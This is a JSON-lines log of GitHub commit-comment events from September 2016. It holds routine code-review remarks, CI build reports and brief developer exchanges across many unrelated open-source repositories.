{"id":"4625526075","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193996,"position":7,"line":315,"path":"src/couch_db.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:54:47Z","updated_at":"2016-09-27T16:54:47Z","body":"I'm not sure on the best place to make this comment, but the return value of this function ends up being either {ok, PurgeSeq, {Id, RevsPurged} or {}} which seems odd both now that we only allow a single id purge now as well as an empty tuple return isn't something I see a lot. I'd suggest that we should tweak this API to be something like `couch_db:purge_doc(Db, Id, Revs) -> {ok, PurgeSeq, ListOfRevsPurged}.` As that seems like it'd be a lot simpler to understand and deal with the return value."}},"created_at":"2016-09-27T16:54:47Z"}
{"id":"4625528874","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":19194002,"position":4,"line":11,"path":"src/main/java/hu/walmag/erp/App.java","commit_id":"5e33f97ccc7f0a92a9998d6c25b59309881ec866","created_at":"2016-09-27T16:55:16Z","updated_at":"2016-09-27T16:55:16Z","body":"Hello"}},"created_at":"2016-09-27T16:55:16Z"}
{"id":"4625530874","type":"CommitCommentEvent","actor":{"login":"jonas054"},"repo":{"name":"bbatsov/rubocop"},"payload":{"comment":{"id":19194009,"position":null,"line":null,"path":null,"commit_id":"2bb7cc411717fd702b80f039d82ee8264462ab57","created_at":"2016-09-27T16:55:37Z","updated_at":"2016-09-27T16:55:37Z","body":"Yes. If we don't think my patch fixes anything, a revert makes sense."}},"created_at":"2016-09-27T16:55:37Z"}
{"id":"4625534514","type":"CommitCommentEvent","actor":{"login":"JasonLantz"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19194016,"position":42,"line":42,"path":"test/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T16:56:14Z","updated_at":"2016-09-27T16:56:14Z","body":"Thanks for the review Mallory!   Just what I needed!\n\n> On Sep 27, 2016, at 8:23 AM, Mallory <notifications@github.com> wrote:\n> \n> Should we still do this? If it doesn't work, doesn't that mean React itself failed?\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-27T16:56:14Z"}
{"id":"4625535780","type":"CommitCommentEvent","actor":{"login":"jleo32"},"repo":{"name":"thedunster/docs"},"payload":{"comment":{"id":19194023,"position":35,"line":35,"path":"content/admin/teamserver/install/InstallingDistributedTeamServer.md","commit_id":"c26e8a41d46d23e9ff9db83ead17e26d28023a62","created_at":"2016-09-27T16:56:28Z","updated_at":"2016-09-27T16:56:28Z","body":"This won't work on Windows"}},"created_at":"2016-09-27T16:56:28Z"}
{"id":"4625536408","type":"CommitCommentEvent","actor":{"login":"vicehope"},"repo":{"name":"vicehope/JC"},"payload":{"comment":{"id":19194025,"position":33,"line":2010,"path":"jc.html","commit_id":"61bcdcfbdafb2f9b590b22d5f0abfb85d3c6015d","created_at":"2016-09-27T16:56:34Z","updated_at":"2016-09-27T16:56:34Z","body":"New `<div>` block of #hkg4 content, consists list of new trophies."}},"created_at":"2016-09-27T16:56:34Z"}
{"id":"4625536643","type":"CommitCommentEvent","actor":{"login":"Alexandermclean"},"repo":{"name":"chenkeyi0917/study"},"payload":{"comment":{"id":19194026,"position":1,"line":1,"path":"README.md","commit_id":"b66ea49d6852be58339f2f265d544c57c0f15bd9","created_at":"2016-09-27T16:56:36Z","updated_at":"2016-09-27T16:56:36Z","body":"##study？"}},"created_at":"2016-09-27T16:56:36Z"}
{"id":"4625537369","type":"CommitCommentEvent","actor":{"login":"rasky"},"repo":{"name":"develersrl/certellino"},"payload":{"comment":{"id":19194027,"position":null,"line":null,"path":null,"commit_id":"506fe93ea61f019a8c038caa648d9ab42865ac85","created_at":"2016-09-27T16:56:43Z","updated_at":"2016-09-27T16:56:43Z","body":"Problem is: without `-e`, if any command fails, the whole script would still succeed, and the web portal would not realise it has failed."}},"created_at":"2016-09-27T16:56:43Z"}
{"id":"4625537759","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19194028,"position":null,"line":null,"path":null,"commit_id":"078016ab72f53f2a0c58b5582e71e7d806080e18","created_at":"2016-09-27T16:56:47Z","updated_at":"2016-09-27T16:56:47Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-27T16:56:47Z"}
{"id":"4625538353","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlstand/PGE-Project"},"payload":{"comment":{"id":19194030,"position":null,"line":null,"path":null,"commit_id":"0caa63d0780e26ced0fcb04571adf3596b846ed2","created_at":"2016-09-27T16:56:53Z","updated_at":"2016-09-27T16:56:53Z","body":"That was already yes ;-)\nJust use \"script=<name of lua file>\" in npc.txt, and get examples you can in the scripts/npcs folder of config pack, and some stuff I'll document bit later. Now I working to add level/world scripts which will work like in LunaLUA with semi-compatible api to allow easier moving from legacy engine to PGE when main stuff will be completely implemented"}},"created_at":"2016-09-27T16:56:53Z"}
{"id":"4625538901","type":"CommitCommentEvent","actor":{"login":"jnweiger"},"repo":{"name":"openSUSE/software-o-o"},"payload":{"comment":{"id":19194031,"position":null,"line":null,"path":null,"commit_id":"e411345168b4d636078bb662071e3935eec89176","created_at":"2016-09-27T16:56:58Z","updated_at":"2016-09-27T16:56:58Z","body":"This should be done with >, not with >>. See https://github.com/openSUSE/software-o-o/pull/106"}},"created_at":"2016-09-27T16:56:58Z"}
{"id":"4625540458","type":"CommitCommentEvent","actor":{"login":"ucchyocean"},"repo":{"name":"Androkai/LunaChat"},"payload":{"comment":{"id":19194037,"position":null,"line":null,"path":null,"commit_id":"cbbdfd0208e9d1f939f9d164a67a9f50b0ef9882","created_at":"2016-09-27T16:57:13Z","updated_at":"2016-09-27T16:57:13Z","body":"@Androkai \r\nThanks for your replying. OK, I understood. I will add my solution for next version.\r\nSince I did not have too many opportunities to work with other plug-ins, it has become my studying. \r\n"}},"created_at":"2016-09-27T16:57:13Z"}
{"id":"4625540969","type":"CommitCommentEvent","actor":{"login":"manhtuan165"},"repo":{"name":"hungphamuy95/ISD"},"payload":{"comment":{"id":19194039,"position":null,"line":null,"path":null,"commit_id":"57af2f30bfcd867af481260253ae92898487b789","created_at":"2016-09-27T16:57:18Z","updated_at":"2016-09-27T16:57:18Z","body":"tao đang test thử mà k hiểu sao nó cứ vào cái shop online\r\nxóa cái shop online đi chứ"}},"created_at":"2016-09-27T16:57:18Z"}
{"id":"4625544240","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19194046,"position":265,"line":1007,"path":"src/couch_bt_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:57:51Z","updated_at":"2016-09-27T16:57:51Z","body":"I've read this comment a couple times and I see that it explains the code below correctly, however I can't convince myself that the assertion that partially purged docs are already updated. The compactor won't see any purges come into the tree since it holds a single MVCC view of the database so it won't see purge changes that happened after it started.\r\n\r\nThis is the only place I can see where we're making purge modifications so it confuses me where else we might be accounting for the purge differences. However its possible I'm missing something about how the restart works that would account for this."}},"created_at":"2016-09-27T16:57:51Z"}
{"id":"4625544445","type":"CommitCommentEvent","actor":{"login":"JRubis"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19194047,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-27T16:57:53Z","updated_at":"2016-09-27T16:57:53Z","body":"What if the:\r\n\r\nFirst: Mote Desync’s\r\nThen: sendDIO() is called. Queue is cleared of all ICMPv6RPL messages including DAO’s.\r\nThen: The Mote Sync’s\r\nFinally: sendDAO() is called. The if (ieee154e_isSynch()==FALSE) condition would be false and the icmpv6rpl_vars.busySendingDAO would still be true. But there wouldn’t be any DAO messages in the queue.\r\n\r\n\r\nFrom: Tengfei.Chang [mailto:notifications@github.com]\r\nSent: Tuesday, September 27, 2016 12:47 PM\r\nTo: openwsn-berkeley/openwsn-fw <openwsn-fw@noreply.github.com>\r\nSubject: Re: [openwsn-berkeley/openwsn-fw] FW-559. separate busySending variable for DIO and DAO. (6146abe)\r\n\r\n\r\n@OnsetJon<https://github.com/OnsetJon> the following are the only two line code which will call openqueue_removeAllCreatedBy(COMPONENT_ICMPv6RPL)\r\nand both them set the busySendingDIO and busySendingDAO as False right after.\r\n\r\nhttps://github.com/openwsn-berkeley/openwsn-fw/blob/develop/openstack/03b-IPv6/icmpv6rpl.c#L526\r\nhttps://github.com/openwsn-berkeley/openwsn-fw/blob/develop/openstack/03b-IPv6/icmpv6rpl.c#L642\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/openwsn-berkeley/openwsn-fw/commit/6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8#commitcomment-19193878>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AM3eGLxqWqlytcbFXyORqlfWoBcAsLLZks5quUiSgaJpZM4KHy1I>.\r\n"}},"created_at":"2016-09-27T16:57:53Z"}
{"id":"4625545487","type":"CommitCommentEvent","actor":{"login":"VladislavSukhorukov"},"repo":{"name":"VladislavSukhorukov/.Net"},"payload":{"comment":{"id":19194050,"position":96,"line":96,"path":"Lab_1","commit_id":"0b944564a89aae5065748ab86945a567298a4593","created_at":"2016-09-27T16:58:04Z","updated_at":"2016-09-27T16:58:04Z","body":"// &"}},"created_at":"2016-09-27T16:58:04Z"}
{"id":"4625547647","type":"CommitCommentEvent","actor":{"login":"maciejrybaniec"},"repo":{"name":"maciejrybaniec/apollo-redux-sandbox"},"payload":{"comment":{"id":19194055,"position":13,"line":23,"path":"src/Containers/MessengerContainer.jsx","commit_id":"b91f6e9b8b99ce8fb992e3a5a5e533fdcd445a44","created_at":"2016-09-27T16:58:27Z","updated_at":"2016-09-27T16:58:27Z","body":"Yes, you're right :)"}},"created_at":"2016-09-27T16:58:27Z"}
{"id":"4625549606","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19194060,"position":49,"line":223,"path":"src/test_engine_compaction.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:58:47Z","updated_at":"2016-09-27T16:58:47Z","body":"You should add a test that tries to exceed the purge limit before compaction finishes."}},"created_at":"2016-09-27T16:58:47Z"}
{"id":"4625552657","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19194068,"position":null,"line":null,"path":null,"commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:59:17Z","updated_at":"2016-09-27T16:59:17Z","body":"Overally this looks really good. I like that the API and implementation look significantly simpler and seem much easier to comprehend now that we're not mixing it with normal doc updates."}},"created_at":"2016-09-27T16:59:17Z"}
{"id":"4625553897","type":"CommitCommentEvent","actor":{"login":"mikebrady"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19194071,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:59:30Z","updated_at":"2016-09-27T16:59:30Z","body":"Right now, I don't think so – AFAIK, in my limited testing, David Hammerton's decoder is bit-perfect.\r\n\r\nTBH, all these changes don't make much difference in terms of perceived audio, except the lower level of dithering. But they are worth experimenting with, I think."}},"created_at":"2016-09-27T16:59:30Z"}
{"id":"4625555026","type":"CommitCommentEvent","actor":{"login":"thet"},"repo":{"name":"plone/plone.patternslib"},"payload":{"comment":{"id":19194076,"position":205,"line":444,"path":"src/plone/patternslib/profiles/default/registry.xml","commit_id":"2a4ce7c02487d3099a6b0d88aaaf5a817af2a118","created_at":"2016-09-27T16:59:40Z","updated_at":"2016-09-27T16:59:40Z","body":"Hmmm... I guess that was not intentional...Should be added back.\r\n\r\nSlightly related: for a good integration in Plone, you would let the plone bundle depend on patternslib and add stub entries in registry for those components, which now are defined in the patterns bundle...."}},"created_at":"2016-09-27T16:59:40Z"}
{"id":"4625557121","type":"CommitCommentEvent","actor":{"login":"jalbertbowden"},"repo":{"name":"jalbertbowden/open-library"},"payload":{"comment":{"id":19194082,"position":null,"line":null,"path":null,"commit_id":"e94fb252b907a85d02bb0641d3f0980be1f0972e","created_at":"2016-09-27T17:00:03Z","updated_at":"2016-09-27T17:00:03Z","body":"open library: library of documents/references/resources about openness in general, specifically its many facets: Open Access, Open Education, Open Educational Resources, Open Government, Open Science, Open Source, etc.  \r\nyou're more than welcome to help out! if you come across any documents, save them and upload them here. Adding the title and reference is preferred, putting them in the README.md.\r\nthanks David!"}},"created_at":"2016-09-27T17:00:03Z"}
{"id":"4625571949","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19194111,"position":27,"line":161,"path":"lib/util-yaml.sh","commit_id":"7d4bb08b0693cfd0371b068c0bbaa169b0df6e5a","created_at":"2016-09-27T17:02:37Z","updated_at":"2016-09-27T17:02:37Z","body":"Please fix this Typo ;)"}},"created_at":"2016-09-27T17:02:37Z"}
{"id":"4625573159","type":"CommitCommentEvent","actor":{"login":"legodude17"},"repo":{"name":"Arcanehood/arcanehood.github.io"},"payload":{"comment":{"id":19194114,"position":null,"line":null,"path":null,"commit_id":"f59f9a343a3505310b6eee1893cdf4e52012d228","created_at":"2016-09-27T17:02:49Z","updated_at":"2016-09-27T17:02:49Z","body":"Why did you delete that?"}},"created_at":"2016-09-27T17:02:49Z"}
{"id":"4625578957","type":"CommitCommentEvent","actor":{"login":"legodude17"},"repo":{"name":"Arcanehood/arcanehood.github.io"},"payload":{"comment":{"id":19194129,"position":null,"line":null,"path":null,"commit_id":"7e98a694ae140e61c88f5ba4eb427fa51f801cd0","created_at":"2016-09-27T17:03:50Z","updated_at":"2016-09-27T17:03:50Z","body":"Ok, I think it is good, now fix it."}},"created_at":"2016-09-27T17:03:50Z"}
{"id":"4625582934","type":"CommitCommentEvent","actor":{"login":"Imperat"},"repo":{"name":"nikitabelonogov/signature-search"},"payload":{"comment":{"id":19194145,"position":null,"line":null,"path":null,"commit_id":"e6cc41bac13362d5b33f0211420bc36a9ea05302","created_at":"2016-09-27T17:04:31Z","updated_at":"2016-09-27T17:04:31Z","body":"Awesome script!"}},"created_at":"2016-09-27T17:04:31Z"}
{"id":"4625586090","type":"CommitCommentEvent","actor":{"login":"MineJoke"},"repo":{"name":"ccldev/v2-compile-sytems"},"payload":{"comment":{"id":19194150,"position":null,"line":null,"path":null,"commit_id":"b27e59cdf2edea94e151de024b855e8f37b93aeb","created_at":"2016-09-27T17:05:06Z","updated_at":"2016-09-27T17:05:06Z","body":"Example?"}},"created_at":"2016-09-27T17:05:06Z"}
{"id":"4625587529","type":"CommitCommentEvent","actor":{"login":"Tristanibus"},"repo":{"name":"timetwister4/nanotwitter"},"payload":{"comment":{"id":19194153,"position":null,"line":null,"path":null,"commit_id":"98a6e8b2843fe685c5a94b6b8ca6f04c7fe18d8c","created_at":"2016-09-27T17:05:21Z","updated_at":"2016-09-27T17:05:21Z","body":"Sorry this was an error going over how to push a commit... "}},"created_at":"2016-09-27T17:05:21Z"}
{"id":"4625593505","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194175,"position":121,"line":830,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:06:26Z","updated_at":"2016-09-27T17:06:26Z","body":"This should be a constants \"_\" and the day format.\r\n\r\nIn addition I suggest to use an StringBuilder instead concat (concat is the same of +) but at least the + leaves the opportunity to the compiler to optimize on bytecode to use a StringBuilder if all + are in the same line.\r\n\r\nIn addition the formatting date should be part of the DateUtil class and do something like:\r\n\r\n```\r\nprivate static Map<String, SimpleDateFormat> formatterMap = new ConcurrentHashMap<>();\r\n\r\npublic String format (final Date date,\r\n                       final String customFormat) {\r\n\r\n        String dateString = null;\r\n        SimpleDateFormat formatter = null;\r\n\r\n        try {\r\n\r\n            if ((DotPreconditions.checkNull(customFormat)) &&\r\n                    ((DotPreconditions.checkNull(date))) {\r\n\r\n                if (!formatterMap.containsKey(customFormat)) {\r\n                \r\n                \tformatterMap.put(customFormat, createFormatter(customFormat));\r\n                }\r\n                \r\n                formatter = formatterMap.get(customFormat);\r\n                \r\n                synchronized (formatter) {\r\n                    dateString =\r\n                            formatter.format(date);\r\n                }\r\n            }\r\n        } catch (Exception e) {\r\n\t\t\t\r\n\t\r\n            dateString = StringUtils.EMPTY;\r\n        }\r\n\r\n        return dateString;\r\n    }\r\n\r\n\r\n\r\n```"}},"created_at":"2016-09-27T17:06:26Z"}
{"id":"4625594137","type":"CommitCommentEvent","actor":{"login":"LLIce"},"repo":{"name":"LLIce/VS2015-ARM"},"payload":{"comment":{"id":19194177,"position":23,"line":21,"path":"README.md","commit_id":"919c0d6386ec8eae92ff6d880f91499bf1056d74","created_at":"2016-09-27T17:06:32Z","updated_at":"2016-09-27T17:06:32Z","body":"111"}},"created_at":"2016-09-27T17:06:32Z"}
{"id":"4625595217","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194184,"position":125,"line":834,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:06:43Z","updated_at":"2016-09-27T17:06:43Z","body":"This should be a constant"}},"created_at":"2016-09-27T17:06:43Z"}
{"id":"4625597644","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19194196,"position":null,"line":null,"path":null,"commit_id":"817cdbbf850a7be10f85841b118f1b4feb5177b9","created_at":"2016-09-27T17:07:09Z","updated_at":"2016-09-27T17:07:09Z","body":"SCORE_ZERO is usually used in place of make_score(0, 0).  Good luck!"}},"created_at":"2016-09-27T17:07:09Z"}
{"id":"4625602359","type":"CommitCommentEvent","actor":{"login":"Tristanibus"},"repo":{"name":"timetwister4/nanotwitter"},"payload":{"comment":{"id":19194212,"position":null,"line":null,"path":null,"commit_id":"11385fdcdba18fcd8c45fc065efd4646efbd6692","created_at":"2016-09-27T17:08:00Z","updated_at":"2016-09-27T17:08:00Z","body":"I initially added my schema into the Design folder with this commit"}},"created_at":"2016-09-27T17:08:00Z"}
{"id":"4625603636","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19194218,"position":null,"line":null,"path":null,"commit_id":"d4a327ae0f307b502a994ef7b479b54c9250b75e","created_at":"2016-09-27T17:08:14Z","updated_at":"2016-09-27T17:08:14Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.271.d4a327ae0f307b502a994ef7b479b54c9250b75e](http://build.palaso.org/viewLog.html?buildId=77159&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1498, ignored: 17 Build time: 00:08:08"}},"created_at":"2016-09-27T17:08:14Z"}
{"id":"4625604427","type":"CommitCommentEvent","actor":{"login":"mfernandamp"},"repo":{"name":"matiasdaza/Lab1-MateCompu"},"payload":{"comment":{"id":19194221,"position":null,"line":null,"path":null,"commit_id":"1fdd56d19f1b771f881e6ef0436e36020627c303","created_at":"2016-09-27T17:08:23Z","updated_at":"2016-09-27T17:08:23Z","body":"Se ingresa problema numero 5 realizado por M.Fernada versión final"}},"created_at":"2016-09-27T17:08:23Z"}
{"id":"4625605161","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194222,"position":211,"line":920,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:08:30Z","updated_at":"2016-09-27T17:08:30Z","body":"This should be a constant"}},"created_at":"2016-09-27T17:08:30Z"}
{"id":"4625609176","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":19194229,"position":19,"line":22,"path":"src/main/java/hu/walmag/erp/App.java","commit_id":"0579c78bc2ed1f3f73355da482a294911b9abec8","created_at":"2016-09-27T17:09:14Z","updated_at":"2016-09-27T17:09:14Z","body":"new CustomerLoader().load();"}},"created_at":"2016-09-27T17:09:14Z"}
{"id":"4625610058","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194231,"position":270,"line":979,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:09:23Z","updated_at":"2016-09-27T17:09:23Z","body":"please use curly brackets "}},"created_at":"2016-09-27T17:09:23Z"}
{"id":"4625610723","type":"CommitCommentEvent","actor":{"login":"vicehope"},"repo":{"name":"vicehope/JC"},"payload":{"comment":{"id":19194236,"position":25,"line":1697,"path":"jc.html","commit_id":"61bcdcfbdafb2f9b590b22d5f0abfb85d3c6015d","created_at":"2016-09-27T17:09:30Z","updated_at":"2016-09-27T17:09:30Z","body":"Add/Change Trophy item"}},"created_at":"2016-09-27T17:09:30Z"}
{"id":"4625612976","type":"CommitCommentEvent","actor":{"login":"Tristanibus"},"repo":{"name":"timetwister4/nanotwitter"},"payload":{"comment":{"id":19194243,"position":null,"line":null,"path":null,"commit_id":"42932a2dbaf3e41605a6463b10139bdbd3885dd1","created_at":"2016-09-27T17:09:53Z","updated_at":"2016-09-27T17:09:53Z","body":"So I finally created a new folder \"schemas\" and added my schema there. I guess you guys can add your schemas there too."}},"created_at":"2016-09-27T17:09:53Z"}
{"id":"4625617087","type":"CommitCommentEvent","actor":{"login":"BanzaiMan"},"repo":{"name":"php-build/php-build"},"payload":{"comment":{"id":19194249,"position":null,"line":null,"path":null,"commit_id":"ee8b8b7173607c6e491425e39f106aecab339e37","created_at":"2016-09-27T17:10:35Z","updated_at":"2016-09-27T17:10:35Z","body":"Hello. Could you elaborate on why?"}},"created_at":"2016-09-27T17:10:35Z"}
{"id":"4625617248","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194250,"position":307,"line":1016,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:10:36Z","updated_at":"2016-09-27T17:10:36Z","body":"Shouldn't use a more sense exception such DotReponsitoryStateException\r\nin addition we have created a set of i18n support exception (runtime and not runtime) if you think you can take advance of them."}},"created_at":"2016-09-27T17:10:36Z"}
{"id":"4625618715","type":"CommitCommentEvent","actor":{"login":"danbucholtz"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19194256,"position":null,"line":null,"path":null,"commit_id":"c2f9c350dea682afcf25c8440110d870e23985e8","created_at":"2016-09-27T17:10:49Z","updated_at":"2016-09-27T17:10:49Z","body":"@astec,\r\n\r\nNo good reason. I actually just changed it to nightly locally as I build out one last demo before we formally release.\r\n\r\nThanks!\r\nDan"}},"created_at":"2016-09-27T17:10:49Z"}
{"id":"4625620167","type":"CommitCommentEvent","actor":{"login":"Junyulive"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19194261,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-27T17:11:06Z","updated_at":"2016-09-27T17:11:06Z","body":"Hi Alex,\n\n\nI just found the issue about the missing queue name, it happens when\nenqueue the job through the web portal.\n\n\nI already submitted the pull request.\n"}},"created_at":"2016-09-27T17:11:06Z"}
{"id":"4625620590","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194262,"position":332,"line":1041,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:11:09Z","updated_at":"2016-09-27T17:11:09Z","body":"plase use curly brackets"}},"created_at":"2016-09-27T17:11:09Z"}
{"id":"4625623170","type":"CommitCommentEvent","actor":{"login":"keremenes"},"repo":{"name":"tomlooman/EpicSurvivalGameSeries"},"payload":{"comment":{"id":19194267,"position":null,"line":null,"path":null,"commit_id":"005e373e3c7c219419036de7b3e9fd539e6b297e","created_at":"2016-09-27T17:11:36Z","updated_at":"2016-09-27T17:11:36Z","body":"did you check when hits more space key (jump) then player flying to the sky ? :) how to fix that ?\r\nthx"}},"created_at":"2016-09-27T17:11:36Z"}
{"id":"4625625818","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19194272,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T17:12:04Z","updated_at":"2016-09-27T17:12:04Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-27T17:12:04Z"}
{"id":"4625628682","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194278,"position":67,"line":67,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:12:35Z","updated_at":"2016-09-27T17:12:35Z","body":"shouldn't be a constant? 200 sounds like something magic for me :P"}},"created_at":"2016-09-27T17:12:35Z"}
{"id":"4625629820","type":"CommitCommentEvent","actor":{"login":"isyed867"},"repo":{"name":"isyed867/SYSC3110_Lab"},"payload":{"comment":{"id":19194279,"position":7,"line":7,"path":"src/BuddyInfo.java","commit_id":"2908d0e1dc598350af7832e4360cf751fbb5ea86","created_at":"2016-09-27T17:12:48Z","updated_at":"2016-09-27T17:12:48Z","body":"I like to live life on the dangerous side of things. "}},"created_at":"2016-09-27T17:12:48Z"}
{"id":"4625631779","type":"CommitCommentEvent","actor":{"login":"lopezdp"},"repo":{"name":"jalbertbowden/open-library"},"payload":{"comment":{"id":19194285,"position":null,"line":null,"path":null,"commit_id":"e94fb252b907a85d02bb0641d3f0980be1f0972e","created_at":"2016-09-27T17:13:08Z","updated_at":"2016-09-27T17:13:08Z","body":"i have been thinking about something like this but unfortunately I'm just a bum from miami with no access to cool docs. i was thinking of building a tool we could publish that would allow the high brow folk up in DC or anywhere, to upload \"Open Docs\" or docs that should be Open, in an encrypted fashion so that the uploader would remain anonymous to those of us maintaining the app... what you think?\r\n\r\ni was thinking we could serve this up and make it so that its easily accessible to the general public.\r\n\r\nwhat i hate about wikileaks, for example, is that it is so difficult to search through docs since it is so much...\r\n\r\ninterested my man?"}},"created_at":"2016-09-27T17:13:08Z"}
{"id":"4625632318","type":"CommitCommentEvent","actor":{"login":"peterlarson"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19194286,"position":null,"line":null,"path":null,"commit_id":"3f23d7339e4dce911fd91e1978783c6e261d543a","created_at":"2016-09-27T17:13:13Z","updated_at":"2016-09-27T17:13:13Z","body":"Swell"}},"created_at":"2016-09-27T17:13:13Z"}
{"id":"4625633972","type":"CommitCommentEvent","actor":{"login":"amardeep434"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19194287,"position":null,"line":null,"path":null,"commit_id":"0698c1b08d43478e9462907ce72f90419b7f1acd","created_at":"2016-09-27T17:13:30Z","updated_at":"2016-09-27T17:13:30Z","body":"dont we need some more commits?"}},"created_at":"2016-09-27T17:13:30Z"}
{"id":"4625637354","type":"CommitCommentEvent","actor":{"login":"knispeja"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19194294,"position":null,"line":null,"path":null,"commit_id":"3f23d7339e4dce911fd91e1978783c6e261d543a","created_at":"2016-09-27T17:14:06Z","updated_at":"2016-09-27T17:14:06Z","body":"Copacetic"}},"created_at":"2016-09-27T17:14:06Z"}
